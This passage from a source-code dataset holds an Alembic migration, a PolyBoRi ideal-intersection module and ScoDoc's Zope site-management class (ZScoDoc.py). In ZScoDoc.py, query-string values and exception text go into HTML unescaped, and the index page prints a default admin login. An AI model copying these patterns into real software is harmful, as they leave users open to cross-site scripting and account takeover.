| 3,933,606,255,565,375,000 | 24.429825 | 99 | 0.549845 | false |
all-of-us/raw-data-repository
|
rdr_service/alembic/versions/5a1b1f7b4761_add_columns_to_genomic_member_.py
|
1
|
2128
|
"""add columns to genomic_set_member
Revision ID: 5a1b1f7b4761
Revises: f3fdb9d05ab3
Create Date: 2019-09-17 16:06:00.824574
"""
from alembic import op
import sqlalchemy as sa
import rdr_service.model.utils
from sqlalchemy.dialects import mysql
from rdr_service.participant_enums import PhysicalMeasurementsStatus, QuestionnaireStatus, OrderStatus
from rdr_service.participant_enums import WithdrawalStatus, WithdrawalReason, SuspensionStatus, QuestionnaireDefinitionStatus
from rdr_service.participant_enums import EnrollmentStatus, Race, SampleStatus, OrganizationType, BiobankOrderStatus
from rdr_service.participant_enums import OrderShipmentTrackingStatus, OrderShipmentStatus
from rdr_service.participant_enums import MetricSetType, MetricsKey, GenderIdentity
from rdr_service.model.base import add_table_history_table, drop_table_history_table
from rdr_service.model.code import CodeType
from rdr_service.model.site_enums import SiteStatus, EnrollingStatus, DigitalSchedulingStatus, ObsoleteStatus
# revision identifiers, used by Alembic.
revision = '5a1b1f7b4761'
down_revision = 'f3fdb9d05ab3'
branch_labels = None
depends_on = None
def upgrade(engine_name):
globals()["upgrade_%s" % engine_name]()
def downgrade(engine_name):
globals()["downgrade_%s" % engine_name]()
def upgrade_rdr():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('genomic_set_member', sa.Column('sample_id', sa.String(length=80), nullable=True))
op.add_column('genomic_set_member', sa.Column('sample_type', sa.String(length=50), nullable=True))
# ### end Alembic commands ###
def downgrade_rdr():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('genomic_set_member', 'sample_type')
op.drop_column('genomic_set_member', 'sample_id')
# ### end Alembic commands ###
def upgrade_metrics():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_metrics():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
|
bsd-3-clause
| 2,115,397,206,497,490,700 | 33.322581 | 125 | 0.74765 | false |
ohanar/PolyBoRi
|
pyroot/polybori/intersect.py
|
1
|
1391
|
#
# intersect.py
# PolyBoRi
#
# Created by Michael Brickenstein on 2008-09-24.
# Copyright 2008 The PolyBoRi Team
#
from polybori.gbcore import groebner_basis
from polybori.statistics import used_vars_set
from itertools import chain
def intersect(i, j, **gb_opts):
"""
This functions intersects two ideals. The first ring variable is used as helper variable for this
intersection. It is assumed, that it doesn't occur in the ideals, and that we have an elimination ordering
for this variables. Both assumptions are checked.
>>> from polybori.frontend import declare_ring
>>> from polybori import Block
>>> r=declare_ring(Block("x", 1000), globals())
>>> x = r.variable
>>> intersect([x(1),x(2)+1],[x(1),x(2)])
[x(1)]
"""
if not i or not j:
return []
uv = used_vars_set(i) * used_vars_set(j)
t = iter(i).next().ring().variable(0)
if uv.reducible_by(t):
raise ValueError, \
"First ring variable has to be reserved as helper variable t"
if not t > uv:
raise ValueError, "need elimination ordering for first ring variable"
gb = groebner_basis(list(chain((t * p for p in i), ((1 + t) * p for p in j
))), **gb_opts)
return [p for p in gb if p.navigation().value() > t.index()]
def _test():
import doctest
doctest.testmod()
if __name__ == "__main__":
_test()
|
gpl-2.0
| 2,140,742,197,082,218,500 | 29.23913 | 110 | 0.632638 | false |
denys-duchier/Scolar
|
ZScoDoc.py
|
1
|
35299
|
# -*- mode: python -*-
# -*- coding: iso8859-15 -*-
##############################################################################
#
# Gestion scolarite IUT
#
# Copyright (c) 2001 - 2013 Emmanuel Viennet. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Emmanuel Viennet emmanuel.viennet@viennet.net
#
##############################################################################
"""Site ScoDoc pour plusieurs departements:
gestion de l'installation et des creation de départements.
Chaque departement est géré par un ZScolar sous ZScoDoc.
"""
import time, string, glob, re, inspect
import urllib, urllib2, cgi, xml
try: from cStringIO import StringIO
except: from StringIO import StringIO
from zipfile import ZipFile
import os.path, glob
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
from email.MIMEBase import MIMEBase
from email.Header import Header
from email import Encoders
# Zope modules:
from OFS.SimpleItem import Item # Basic zope object
from OFS.PropertyManager import PropertyManager # provide the 'Properties' tab with the
# 'manage_propertiesForm' method
from OFS.ObjectManager import ObjectManager
from AccessControl.Role import RoleManager # provide the 'Ownership' tab with
# the 'manage_owner' method
from AccessControl import ClassSecurityInfo
import Globals
from Globals import DTMLFile # can use DTML files
from Globals import Persistent
from Globals import INSTANCE_HOME
from Acquisition import Implicit
#
try:
import Products.ZPsycopgDA.DA as ZopeDA
except:
import ZPsycopgDA.DA as ZopeDA # interp.py
from sco_utils import *
from notes_log import log
from ZScoUsers import pwdFascistCheck
class ZScoDoc(ObjectManager,
PropertyManager,
RoleManager,
Item,
Persistent,
Implicit
):
"ZScoDoc object"
meta_type = 'ZScoDoc'
security=ClassSecurityInfo()
file_path = Globals.package_home(globals())
# This is the list of the methods associated to 'tabs' in the ZMI
# Be aware that The first in the list is the one shown by default, so if
# the 'View' tab is the first, you will never see your tabs by cliquing
# on the object.
manage_options = (
( {'label': 'Contents', 'action': 'manage_main'}, )
+ PropertyManager.manage_options # add the 'Properties' tab
+ (
# this line is kept as an example with the files :
# dtml/manage_editZScolarForm.dtml
# html/ZScolar-edit.stx
# {'label': 'Properties', 'action': 'manage_editForm',},
{'label': 'View', 'action': 'index_html'},
)
+ Item.manage_options # add the 'Undo' & 'Owner' tab
+ RoleManager.manage_options # add the 'Security' tab
)
def __init__(self, id, title):
"Initialise a new instance of ZScoDoc"
self.id = id
self.title = title
self.manage_addProperty('admin_password_initialized', '0', 'string')
security.declareProtected(ScoView, 'ScoDocURL')
def ScoDocURL(self): # XXX unused
"base URL for this instance (top level for ScoDoc site)"
return self.absolute_url()
def _check_admin_perm(self, REQUEST):
"""Check if user has permission to add/delete departements
"""
authuser = REQUEST.AUTHENTICATED_USER
if authuser.has_role('manager') or authuser.has_permission(ScoSuperAdmin,self):
return ''
else:
return """<h2>Vous n'avez pas le droit d'accéder à cette page</h2>"""
def _check_users_folder(self, REQUEST=None):
"""Vérifie UserFolder et le crée s'il le faut
"""
try:
udb = self.UsersDB
return '<!-- uf ok -->'
except:
e = self._check_admin_perm(REQUEST)
if not e: # admin permissions:
self.create_users_cnx(REQUEST)
self.create_users_folder(REQUEST)
return '<div class="head_message">Création du connecteur utilisateurs réussie</div>'
else:
return """<div class="head_message">Installation non terminée: connectez vous avec les droits d'administrateur</div>"""
security.declareProtected('View','create_users_folder')
def create_users_folder(self, REQUEST=None):
"""Create Zope user folder
"""
e = self._check_admin_perm(REQUEST)
if e:
return e
if REQUEST is None:
REQUEST = {}
REQUEST.form['pgauth_connection']='UsersDB'
REQUEST.form['pgauth_table']='sco_users'
REQUEST.form['pgauth_usernameColumn']='user_name'
REQUEST.form['pgauth_passwordColumn']='passwd'
REQUEST.form['pgauth_rolesColumn']='roles'
add_method = self.manage_addProduct['OFSP'].manage_addexUserFolder
log('create_users_folder: in %s' % self.id)
return add_method(
authId='pgAuthSource',
propId='nullPropSource',
memberId='nullMemberSource',
groupId='nullGroupSource',
cryptoId='MD51',
# doAuth='1', doProp='1', doMember='1', doGroup='1', allDone='1',
cookie_mode=2,
session_length=500,
not_session_length=0,
REQUEST=REQUEST
)
def _fix_users_folder(self):
"""removes docLogin and docLogout dtml methods from exUserFolder, so that we use ours.
(called each time be index_html, to fix old ScoDoc installations.)
"""
try:
self.acl_users.manage_delObjects(ids=[ 'docLogin', 'docLogout' ])
except:
pass
# add missing getAuthFailedMessage (bug in exUserFolder ?)
try:
x = self.getAuthFailedMessage
except:
log('adding getAuthFailedMessage to Zope install')
parent = self.aq_parent
from OFS.DTMLMethod import addDTMLMethod
addDTMLMethod(parent, 'getAuthFailedMessage', file='Identification')
security.declareProtected('View','create_users_cnx')
def create_users_cnx(self, REQUEST=None):
"""Create Zope connector to UsersDB
Note: la connexion est fixée (SCOUSERS) (base crée par l'installeur) !
Les utilisateurs avancés pourront la changer ensuite.
"""
# ce connecteur zope - db est encore pour l'instant utilisé par exUserFolder.pgAuthSource
# (en lecture seule en principe)
oid = 'UsersDB'
log('create_users_cnx: in %s' % self.id)
da = ZopeDA.Connection(
oid, 'Cnx bd utilisateurs',
SCO_DEFAULT_SQL_USERS_CNX,
False,
check=1, tilevel=2, encoding='LATIN1')
self._setObject(oid, da)
security.declareProtected('View', 'change_admin_user')
def change_admin_user(self, password, REQUEST=None):
"""Change password of admin user"""
# note: controle sur le role et non pas sur une permission
# (non definies au top level)
if not REQUEST.AUTHENTICATED_USER.has_role('Manager'):
log('user %s is not Manager' % REQUEST.AUTHENTICATED_USER)
log('roles=%s' % REQUEST.AUTHENTICATED_USER.getRolesInContext(self))
raise AccessDenied("vous n'avez pas le droit d'effectuer cette opération")
log("trying to change admin password")
# 1-- check strong password
if pwdFascistCheck(password) != None:
log("refusing weak password")
return REQUEST.RESPONSE.redirect("change_admin_user_form?message=Mot%20de%20passe%20trop%20simple,%20recommencez")
# 2-- change password for admin user
username = 'admin'
acl_users = self.aq_parent.acl_users
user=acl_users.getUser(username)
r = acl_users._changeUser(username, password, password ,user.roles,user.domains)
if not r:
# OK, set property to indicate we changed the password
log('admin password changed successfully')
self.manage_changeProperties(admin_password_initialized='1')
return r or REQUEST.RESPONSE.redirect("index_html")
security.declareProtected('View', 'change_admin_user_form')
def change_admin_user_form(self, message='', REQUEST=None):
"""Form allowing to change the ScoDoc admin password"""
# note: controle sur le role et non pas sur une permission
# (non definies au top level)
if not REQUEST.AUTHENTICATED_USER.has_role('Manager'):
raise AccessDenied("vous n'avez pas le droit d'effectuer cette opération")
H = [ self._html_begin %
{ 'page_title' : 'ScoDoc: changement mot de passe',
'encoding' : SCO_ENCODING },
self._top_level_css,
"""</head><body>"""
]
if message:
H.append('<div id="message">%s</div>' % message )
H.append("""<h2>Changement du mot de passe administrateur (utilisateur admin)</h2>
<p>
<form action="change_admin_user" method="post"><table>
<tr><td>Nouveau mot de passe:</td><td><input type="password" size="14" name="password"/></td></tr>
<tr><td>Confirmation: </td><td><input type="password" size="14" name="password2" /></td></tr>
</table>
<input type="submit" value="Changer">
"""
)
H.append("""</body></html>""")
return '\n'.join(H)
security.declareProtected('View','list_depts')
def list_depts(self, REQUEST=None):
"""List departments folders
(returns a list of Zope folders containing a ZScolar instance)
"""
folders = self.objectValues('Folder')
# select folders with Scolarite object:
r = []
for folder in folders:
try:
s = folder.Scolarite
r.append(folder)
except:
pass
return r
security.declareProtected('View','create_dept')
def create_dept(self, REQUEST=None, DeptId='', pass2=False):
"""Creation (ajout) d'un site departement
(instance ZScolar + dossier la contenant)
"""
e = self._check_admin_perm(REQUEST)
if e:
return e
if not DeptId:
raise ValueError('nom de departement invalide')
if not pass2:
# 1- Creation de repertoire Dept
add_method = self.manage_addProduct['OFSP'].manage_addFolder
add_method( DeptId, title='Site dept. ' + DeptId )
DeptFolder = self[DeptId]
if not pass2:
# 2- Creation du repertoire Fotos
add_method = DeptFolder.manage_addProduct['OFSP'].manage_addFolder
add_method( 'Fotos', title='Photos identites ' + DeptId )
# 3- Creation instance ScoDoc
add_method = DeptFolder.manage_addProduct['ScoDoc'].manage_addZScolarForm
return add_method( DeptId, REQUEST=REQUEST )
security.declareProtected('View','delete_dept')
def delete_dept(self, REQUEST=None, DeptId='', force=False):
"""Supprime un departement (de Zope seulement, ne touche pas la BD)
"""
e = self._check_admin_perm(REQUEST)
if e:
return e
if not force and DeptId not in [ x.id for x in self.list_depts() ]:
raise ValueError('nom de departement invalide')
self.manage_delObjects(ids=[ DeptId ])
return '<p>Département ' + DeptId + """ supprimé du serveur web (la base de données n'est pas affectée)!</p><p><a href="%s">Continuer</a></p>""" % REQUEST.URL1
_top_level_css = """
<style type="text/css">
div.maindiv {
margin: 1em;
}
ul.main {
list-style-type: square;
}
ul.main li {
padding-bottom: 2ex;
}
#scodoc_attribution p {
font-size:75%;
}
div.head_message {
margin-top: 2px;
margin-bottom: 0px;
padding: 0.1em;
margin-left: auto;
margin-right: auto;
background-color: #ffff73;
-moz-border-radius: 8px;
-khtml-border-radius: 8px;
border-radius: 8px;
font-family : arial, verdana, sans-serif ;
font-weight: bold;
width: 40%;
text-align: center;
}
#scodoc_admin {
background-color: #EEFFFF;
}
h4 {
padding-top: 20px;
padding-bottom: 0px;
}
#message {
margin-top: 2px;
margin-bottom: 0px;
padding: 0.1em;
margin-left: auto;
margin-right: auto;
background-color: #ffff73;
-moz-border-radius: 8px;
-khtml-border-radius: 8px;
border-radius: 8px;
font-family : arial, verdana, sans-serif ;
font-weight: bold;
width: 40%;
text-align: center;
color: red;
}
.help {
font-style: italic;
color: red;
}
</style>"""
_html_begin = """<?xml version="1.0" encoding="%(encoding)s"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%(page_title)s</title>
<meta http-equiv="Content-Type" content="text/html; charset=%(encoding)s" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta name="LANG" content="fr" />
<meta name="DESCRIPTION" content="ScoDoc" />"""
security.declareProtected('View', 'index_html')
def index_html(self, REQUEST=None, message=None):
"""Top level page for ScoDoc
"""
authuser = REQUEST.AUTHENTICATED_USER
deptList = self.list_depts()
self._fix_users_folder() # fix our exUserFolder
isAdmin = not self._check_admin_perm(REQUEST)
try:
admin_password_initialized = self.admin_password_initialized
except:
admin_password_initialized = '0'
if isAdmin and admin_password_initialized != '1':
REQUEST.RESPONSE.redirect( "ScoDoc/change_admin_user_form?message=Le%20mot%20de%20passe%20administrateur%20doit%20etre%20change%20!")
# Si l'URL indique que l'on est dans un folder, affiche page login du departement
try:
deptfoldername = REQUEST.URL0.split('ScoDoc')[1].split('/')[1]
if deptfoldername in [ x.id for x in self.list_depts() ]:
return self.index_dept(deptfoldername=deptfoldername, REQUEST=REQUEST)
except:
pass
H = [ self._html_begin %
{ 'page_title' : 'ScoDoc: bienvenue',
'encoding' : SCO_ENCODING },
self._top_level_css,
"""</head><body>""",
CUSTOM_HTML_HEADER_CNX,
self._check_users_folder(REQUEST=REQUEST), # ensure setup is done
self._check_icons_folder(REQUEST=REQUEST) ]
if message:
H.append('<div id="message">%s</div>' % message )
if isAdmin and not message:
H.append('<div id="message">Attention: connecté comme administrateur</div>' )
H.append("""
<div class="maindiv">
<h2>ScoDoc: gestion scolarité</h2>
<p>
Ce site est <font color="red"><b>réservé au personnel autorisé</b></font>.
</p>
""")
if not deptList:
H.append('<em>aucun département existant !</em>')
# si pas de dept et pas admin, propose lien pour loger admin
if not isAdmin:
H.append("""<p><a href="/force_admin_authentication">Identifiez vous comme administrateur</a> (au début: nom 'admin', mot de passe 'scodoc')</p>""")
else:
H.append('<ul class="main">')
if isAdmin:
dest_folder = '/Scolarite'
else:
dest_folder = ''
for deptFolder in self.list_depts():
H.append('<li><a class="stdlink" href="%s%s">Scolarité département %s</a>'
% (deptFolder.absolute_url(), dest_folder, deptFolder.id))
# check if roles are initialized in this depts, and do it if necessary
if deptFolder.Scolarite.roles_initialized == '0':
if isAdmin:
deptFolder.Scolarite._setup_initial_roles_and_permissions()
else:
H.append(' (non initialisé, connectez vous comme admin)')
H.append('</li>')
H.append('</ul>')
if isAdmin:
H.append('<p><a href="scodoc_admin">Administration de ScoDoc</a></p>')
else:
H.append('<p><a href="%s/force_admin_authentication">Se connecter comme administrateur</a></p>' % REQUEST.BASE0)
try:
img = self.icons.firefox_fr.tag(border='0')
except:
img = '' # icons folder not yet available
H.append("""
<div id="scodoc_attribution">
<p><a href="%s">ScoDoc</a> est un logiciel libre de suivi de la scolarité des étudiants conçu par
E. Viennet (Université Paris 13).</p>
<p>Ce logiciel est conçu pour un navigateur récent et <em>ne s'affichera pas correctement avec un logiciel
ancien</em>. Utilisez par exemple Firefox (libre et gratuit).</p>
<a href="http://www.mozilla-europe.org/fr/products/firefox/">%s</a>
</div>
</div>""" % (SCO_WEBSITE,img) )
H.append("""</body></html>""")
return '\n'.join(H)
security.declareProtected('View', 'index_dept')
def index_dept(self, deptfoldername='', REQUEST=None):
"""Page d'accueil departement"""
authuser = REQUEST.AUTHENTICATED_USER
try:
dept = getattr(self, deptfoldername)
if authuser.has_permission(ScoView,dept):
return REQUEST.RESPONSE.redirect('ScoDoc/%s/Scolarite'%deptfoldername)
except:
log('*** problem in index_dept (%s) user=%s' % (deptfoldername,str(authuser)))
H = [ self.standard_html_header(self),
"""<div style="margin: 1em;">
<h2>Scolarité du département %s</h2>
<p>
Ce site est
<font color="#FF0000"><b>réservé au personnel du département</b></font>.
</p>
<!-- login -->
<form action="doLogin" method="post">
<input type="hidden" name="destination" value="Scolarite"/>
<p>
<table border="0" cellpadding="3">
<tr>
<td><b>Nom:</b></td>
<td><input id="name" type="text" name="__ac_name" size="20"/></td>
</tr><tr>
<td><b>Mot de passe:</b></td>
<td><input id="password" type="password" name="__ac_password" size="20"/></td>
<td><input id="submit" name="submit" type="submit" value="OK"/></td>
</tr>
</table>
</p>
</form>
<p>Pour quitter, <a href="acl_users/logout">logout</a>
</p>
<p>Ce site est conçu pour un navigateur récent et <em>ne s'affichera pas correctement avec un logiciel
ancien</em>. Utilisez par exemple Firefox (gratuit et respectueux des normes).</p>
<a href="http://www.mozilla-europe.org/fr/products/firefox/">%s</a>
</div>
""" % (deptfoldername, self.icons.firefox_fr.tag(border='0')),
self.standard_html_footer(self)]
return '\n'.join(H)
security.declareProtected('View', 'doLogin')
def doLogin(self, REQUEST=None, destination=None):
"redirect to destination after login"
if destination:
return REQUEST.RESPONSE.redirect( destination )
security.declareProtected('View', 'docLogin')
docLogin = DTMLFile('dtml/docLogin', globals())
security.declareProtected('View', 'docLogout')
docLogout = DTMLFile('dtml/docLogout', globals())
security.declareProtected('View', 'query_string_to_form_inputs')
def query_string_to_form_inputs(self, query_string=''):
"""Return html snippet representing the query string as POST form hidden inputs.
This is useful in conjonction with exUserfolder to correctly redirect the response
after authentication.
"""
H = []
for a in query_string.split('&'):
if a:
nv = a.split('=')
if len(nv) == 2:
name, value = nv
H.append( '<input type="hidden" name="' + name
+'" value="' + value + '"/>' )
return '<!-- query string -->\n' + '\n'.join(H)
security.declareProtected('View', 'standard_html_header')
def standard_html_header(self, REQUEST=None):
"""Standard HTML header for pages outside depts"""
# not used in ZScolar, see sco_header
return """<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
<title>ScoDoc: accueil</title>
<META http-equiv="Content-Type" content="text/html; charset=%s">
<META http-equiv="Content-Style-Type" content="text/css">
<META name="LANG" content="fr">
<META name="DESCRIPTION" content="ScoDoc: gestion scolarite">
<link HREF="/ScoDoc/static/css/scodoc.css" rel="stylesheet" type="text/css"/>
</head><body>%s""" % (SCO_ENCODING, CUSTOM_HTML_HEADER_CNX)
security.declareProtected('View', 'standard_html_footer')
def standard_html_footer(self, REQUEST=None):
return """<p class="footer">
Problème de connexion (identifiant, mot de passe): <em>contacter votre responsable ou chef de département</em>.<br/>
Problèmes et suggestions sur le logiciel: <a href="mailto:emmanuel.viennet@univ-paris13.fr">emmanuel.viennet@univ-paris13.fr</a>
ou <a href="mailto:%s">%s</a>
</p>
</body></html>""" % (SCO_USERS_LIST, SCO_USERS_LIST)
# sendEmail is not used through the web
def sendEmail(self,msg):
# sends an email to the address using the mailhost, if there is one
try:
mail_host = self.MailHost
except:
log('warning: sendEmail: no MailHost found !')
return
# a failed notification shouldn't cause a Zope error on a site.
try:
mail_host.send(msg.as_string())
log('sendEmail: ok')
except:
log('sendEmail: exception while sending message')
pass
def sendEmailFromException(self,msg):
# Send email by hand, as it seems to be not possible to use Zope Mail Host
# from an exception handler (see https://bugs.launchpad.net/zope2/+bug/246748)
log('sendEmailFromException')
try:
p = os.popen("sendmail -t", 'w') # old brute force method
p.write(msg.as_string())
exitcode = p.close()
if exitcode:
log('sendmail exit code: %s' % exitcode)
except:
log('an exception occurred sending mail')
security.declareProtected('View', 'standard_error_message')
def standard_error_message(self, error_value=None, error_message=None, error_type=None,
error_traceback=None, error_tb=None, **kv):
"Recuperation des exceptions Zope"
sco_dev_mail = SCO_DEV_MAIL
# neat (or should I say dirty ?) hack to get REQUEST
# in fact, our caller (probably SimpleItem.py) has the REQUEST variable
# that we'd like to use for our logs, but does not pass it as an argument.
try:
frame = inspect.currentframe()
REQUEST = frame.f_back.f_locals['REQUEST']
except:
REQUEST = {}
# Authentication uses exceptions, pass them up
HTTP_X_FORWARDED_FOR = REQUEST.get('HTTP_X_FORWARDED_FOR', '')
if error_type == 'LoginRequired':
# raise 'LoginRequired', '' # copied from exuserFolder (beurk, old style exception...)
log('LoginRequired from %s' % HTTP_X_FORWARDED_FOR)
self.login_page = error_value
return error_value
elif error_type == 'Unauthorized':
log('Unauthorized from %s' % HTTP_X_FORWARDED_FOR)
return self.acl_users.docLogin(self, REQUEST=REQUEST)
log('exception caught: %s' % error_type)
if error_type == 'ScoGenError':
return '<p>' + str(error_value) + '</p>'
elif error_type == 'ScoValueError':
# Not a bug, presents a gentle message to the user:
H = [ self.standard_html_header(self),
"""<h2>Erreur !</h2><p>%s</p>""" % error_value ]
if error_value.dest_url:
H.append('<p><a href="%s">Continuer</a></p>' % error_value.dest_url )
H.append(self.standard_html_footer(self))
return '\n'.join(H)
else: # Other exceptions, try carefully to build an error page...
#log('exc A')
H = []
try:
H.append( self.standard_html_header(self) )
except:
pass
if error_message:
H.append( str(error_message) )
else:
H.append("""<table border="0" width="100%%"><tr valign="top">
<td width="10%%" align="center"></td>
<td width="90%%"><h2>Erreur !</h2>
<p>Une erreur est survenue</p>
<p>
<strong>Error Type: %(error_type)s</strong><br>
<strong>Error Value: %(error_value)s</strong><br>
</p>
<hr noshade>
<p>L'URL est peut-etre incorrecte ?</p>
<p>Si l'erreur persiste, contactez Emmanuel Viennet:
<a href="mailto:%(sco_dev_mail)s">%(sco_dev_mail)s</a>
en copiant ce message d'erreur et le contenu du cadre bleu ci-dessous si possible.
</p>
</td></tr>
</table> """ % vars() )
# display error traceback (? may open a security risk via xss attack ?)
#log('exc B')
txt_html = self._report_request(REQUEST, format='html')
H.append("""<h4>Zope Traceback (à envoyer par mail à <a href="mailto:%(sco_dev_mail)s">%(sco_dev_mail)s</a>)</h4><div style="background-color: rgb(153,153,204); border: 1px;">
%(error_tb)s
<p><b>Informations:</b><br/>
%(txt_html)s
</p>
</div>
<p>Merci de votre patience !</p>
""" % vars() )
try:
H.append( self.standard_html_footer(self) )
except:
log('no footer found for error page')
pass
# --- Mail:
error_traceback_txt = scodoc_html2txt(error_tb)
txt = """
ErrorType: %(error_type)s
%(error_traceback_txt)s
""" % vars()
self.send_debug_alert(txt, REQUEST=REQUEST)
# ---
log('done processing exception')
# log( '\n page=\n' + '\n'.join(H) )
return '\n'.join(H)
def _report_request(self, REQUEST, format='txt'):
"""string describing current request for bug reports"""
AUTHENTICATED_USER = REQUEST.get('AUTHENTICATED_USER', '')
dt = time.asctime()
URL = REQUEST.get('URL', '')
QUERY_STRING = REQUEST.get('QUERY_STRING', '')
if QUERY_STRING:
QUERY_STRING = '?' + QUERY_STRING
REFERER = 'na' # REQUEST.get('HTTP_REFERER', '')
form = REQUEST.get('form', '')
HTTP_X_FORWARDED_FOR = REQUEST.get('HTTP_X_FORWARDED_FOR', '')
HTTP_USER_AGENT = 'na' # REQUEST.get('HTTP_USER_AGENT', '')
svn_version = get_svn_version(self.file_path)
txt = """
User: %(AUTHENTICATED_USER)s
Date: %(dt)s
URL: %(URL)s%(QUERY_STRING)s
REFERER: %(REFERER)s
Form: %(form)s
Origin: %(HTTP_X_FORWARDED_FOR)s
Agent: %(HTTP_USER_AGENT)s
subversion: %(svn_version)s
""" % vars()
if format == 'html':
txt = txt.replace('\n', '<br/>')
return txt
security.declareProtected(ScoSuperAdmin, 'send_debug_alert')# not called through the web
def send_debug_alert(self, txt, REQUEST=None):
"""Send an alert email (bug report) to ScoDoc developpers"""
if not SCO_DEV_MAIL:
log('send_debug_alert: email disabled')
return
if REQUEST:
txt = self._report_request(REQUEST) + txt
URL = REQUEST.get('URL', '')
else:
URL = 'send_debug_alert'
msg = MIMEMultipart()
subj = Header( '[scodoc] exc %s' % URL, SCO_ENCODING )
msg['Subject'] = subj
recipients = [ SCO_DEV_MAIL ]
msg['To'] = ' ,'.join(recipients)
msg['From'] = 'scodoc-alert'
msg.epilogue = ''
msg.attach(MIMEText( txt, 'plain', SCO_ENCODING ))
self.sendEmailFromException(msg)
log('Sent mail alert:\n' + txt)
security.declareProtected('View', 'scodoc_admin')
def scodoc_admin(self, REQUEST=None):
"""Page Operations d'administration
"""
e = self._check_admin_perm(REQUEST)
if e:
return e
H = [ self._html_begin %
{ 'page_title' : 'ScoDoc: bienvenue',
'encoding' : SCO_ENCODING },
self._top_level_css,
"""</head>
<body>
<h3>Administration ScoDoc</h3>
<p><a href="change_admin_user_form">changer le mot de passe super-administrateur</a></p>
<p><a href="%s">retour à la page d'accueil</a></p>
<h4>Création d'un département</h4>
<p class="help">Le département doit avoir été créé au préalable sur le serveur en utilisant le script
<tt>create_dept.sh</tt> (à lancer comme <tt>root</tt> dans le répertoire <tt>config</tt> de ScoDoc).
</p>""" % self.absolute_url()]
deptList = [ x.id for x in self.list_depts() ] # definis dans Zope
deptIds = Set(self._list_depts_ids()) # definis sur le filesystem
existingDepts = Set(deptList)
addableDepts = deptIds - existingDepts
if not addableDepts:
# aucun departement defini: aide utilisateur
H.append("<p>Aucun département à ajouter !</p>")
else:
H.append("""<form action="create_dept"><select name="DeptId"/>""")
for deptId in addableDepts:
H.append("""<option value="%s">%s</option>""" % (deptId,deptId))
H.append("""</select>
<input type="submit" value="Créer département">
</form>""" )
if deptList:
H.append("""
<h4>Suppression d'un département</h4>
<p>Ceci permet de supprimer le site web associé à un département, mais n'affecte pas la base de données
(le site peut donc être recréé sans perte de données).
</p>
<form action="delete_dept">
<select name="DeptId">
""")
for deptFolder in self.list_depts():
H.append('<option value="%s">%s</option>'
% (deptFolder.id, deptFolder.id) )
H.append("""</select>
<input type="submit" value="Supprimer département">
</form>""")
# Autres opérations
H.append("""<h4>Autres opérations</h4>
<ul>
<li><a href="build_icons_folder">Reconstruire les icônes</a></li>
</ul>
""")
H.append("""</body></html>""")
return '\n'.join(H)
def _list_depts_ids(self):
"""Liste de id de departements definis par create_dept.sh
(fichiers depts/*.cfg)
"""
filenames = glob.glob( self.file_path + '/config/depts/*.cfg')
ids = [ os.path.split(os.path.splitext(f)[0])[1] for f in filenames ]
return ids
def _check_icons_folder(self,REQUEST=None): # not published
"""Vérifie icons folder Zope et le crée s'il le faut
XXX deprecated: on utilisera maintenant les images statiques via sco_utils.icontag()
"""
try:
icons = self.icons
plus = self.icons.plus_img # upgrade jul 2008
arrow_up = self.icons.arrow_up # nov 2009
return '<!-- icons ok -->'
except:
e = self._check_admin_perm(REQUEST)
if not e: # admin permissions:
self.build_icons_folder(REQUEST)
return '<div class="head_message">Création du dossier icons réussie</div>'
else:
return """<div class="head_message">Installation non terminée: connectez vous avec les droits d'administrateur</div>"""
security.declareProtected('View', 'build_icons_folder')
def build_icons_folder(self,REQUEST=None):
"""Build folder with Zope images
"""
e = self._check_admin_perm(REQUEST)
if e:
return e
return self.do_build_icons_folder(REQUEST=REQUEST)
security.declareProtected('View', 'do_build_icons_folder')
def do_build_icons_folder(self,REQUEST=None): # not published
# Build folder with Zope images
id = 'icons'
try:
o = self[id]
exists = True
except:
exists = False
# If folder exists, destroy it !
if exists:
log('build_image_folder: destroying existing folder !')
self.manage_delObjects(ids=[ id ])
# Create Zope folder
log('build_image_folder: building new %s folder' % id )
self.manage_addProduct['OFSP'].manage_addFolder(id, title='ScoDoc icons')
folder = self[id]
# Create Zope images instances for each file in .../static/icons/*
path = self.file_path + '/static/icons/'
add_method = folder.manage_addProduct['OFSP'].manage_addImage
for filename in os.listdir(path):
if filename != '.svn':
iid = os.path.splitext(filename)[0]
log('adding image %s as %s' % (filename,iid))
add_method( iid, open(path+'/'+filename) )
return 'ok'
security.declareProtected('View', 'http_expiration_date')
def http_expiration_date(self):
"http expiration date for cachable elements (css, ...)"
d = datetime.timedelta(minutes=10)
return (datetime.datetime.utcnow() + d).strftime("%a, %d %b %Y %H:%M:%S GMT")
security.declareProtected('View', 'get_etud_dept')
def get_etud_dept(self, REQUEST=None):
"""Returns the dept id (eg "GEII") of an etud (identified by etudid, INE or NIP in REQUEST).
Warning: This function is inefficient and its result should be cached.
"""
depts = self.list_depts()
for dept in depts:
etud = dept.Scolarite.getEtudInfo(REQUEST=REQUEST)
if etud:
return dept.id
return '' # not found
def manage_addZScoDoc(self, id= 'ScoDoc',
title='Site ScoDoc',
REQUEST=None):
"Add a ZScoDoc instance to a folder."
log('============== creating a new ScoDoc instance =============')
zscodoc = ZScoDoc(id, title) # ne cree (presque rien), tout se passe lors du 1er accès
self._setObject(id,zscodoc)
if REQUEST is not None:
REQUEST.RESPONSE.redirect('%s/manage_workspace' % REQUEST.URL1)
return id
|
gpl-2.0
